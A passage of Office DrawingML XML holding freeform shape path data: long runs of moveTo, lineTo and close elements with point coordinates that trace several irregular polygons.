                      <a:pt x="621" y="654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="652"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="621" y="634"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="623" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="633" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="647" y="650"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="650" y="655"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="653" y="652"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="653" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="646" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="643" y="626"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="640" y="616"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="643" y="613"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="650" y="611"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="615"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="663" y="623"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="628"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="669" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="615"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="673" y="611"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="678" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="686" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="689" y="647"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="688" y="665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="681" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="680" y="692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="683" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="680" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="669" y="711"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="663" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="652" y="714"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="411" y="672"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="395" y="660"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="396" y="639"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="634"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="432" y="642"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="647"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="668"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="471" y="678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="680"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="680"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="506" y="675"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="503" y="650"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="496" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="487" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="617"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="497" y="606"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="501" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="597"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="513" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="518" y="623"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="518" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="526" y="659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="660"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="650"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="648"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="655"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="564" y="666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="560" y="705"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="555" y="713"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="550" y="716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="533" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="524" y="717"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="712"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="711"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="725"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="486" y="730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="479" y="736"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="744"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="750"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="749"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="438" y="747"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="428" y="739"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="729"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="725"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="439" y="724"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="444" y="720"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="718"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="459" y="717"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="717"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="471" y="713"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="695"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="694"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="437" y="702"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="706"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="707"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="710"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="700"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="705"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="707"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="704"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="694"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="691"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="411" y="672"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="748" y="630"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="738" y="628"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="722" y="623"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="717" y="622"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="710" y="607"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="702" y="594"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="703" y="587"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="721" y="585"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="732" y="594"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="742" y="595"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="743" y="595"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="750" y="606"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="749" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="750" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="748" y="630"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="327" y="659"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="323" y="654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="628"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="617"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="613"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="596"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="339" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="563"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="558"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="559"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="549"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="564"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="580"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="390" y="589"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="607"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="628"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="597"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="592"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="612"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="339" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="647"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="659"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="498" y="519"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="487" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="470" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="553"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449" y="549"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="531"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="517"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="513"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="481" y="513"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="519"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="705" y="515"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="697" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="507"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="490"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="676" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="676" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="678" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="694" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="707" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="729" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="729" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="727" y="505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="506"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="713" y="512"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="705" y="515"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="656" y="531"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="648" y="529"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="644" y="523"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="501"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="633" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="491"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="585" y="492"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="486"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="571" y="465"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="574" y="460"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="460"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="592" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="449"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="427"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="574" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="564" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="604" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="640" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="649" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="653" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="665" y="505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="519"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="663" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="656" y="531"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="807" y="286"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="813" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="819" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="822" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="825" y="333"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="828" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="836" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="836" y="327"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="836" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="839" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="844" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="850" y="327"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="852" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="852" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="852" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="858" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="864" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="873" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="885" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="877" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="866" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="855" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="849" y="439"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="847" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="845" y="458"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="842" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="831" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="827" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="830" y="471"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="830" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="827" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="824" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="816" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="809" y="466"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="808" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="807" y="491"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="806" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="800" y="495"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="787" y="491"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="777" y="486"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="743" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="781" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="788" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="799" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="781" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="760" y="390"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="752" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="741" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="737" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="730" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="726" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="718" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="705" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="736" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="727" y="327"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="721" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="729" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="735" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="741" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="742" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="730" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="737" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="746" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="754" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="759" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="756" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="765" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="772" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="778" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="789" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="794" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="799" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="804" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="807" y="286"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="807" y="206"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="801" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="793" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="791" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="797" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="802" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="807" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="832" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="841" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="850" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="863" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="865" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="868" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="878" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="890" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="904" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="909" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="928" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="947" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="957" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="967" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="970" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="960" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="948" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="943" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="945" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="954" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="962" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="972" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="989" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1001" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1015" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1022" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1031" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1033" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1035" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1028" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1022" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1026" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1036" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1049" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1061" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1073" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1076" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1076" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1074" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1087" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1097" y="12"/>
                    </a:lnTo>
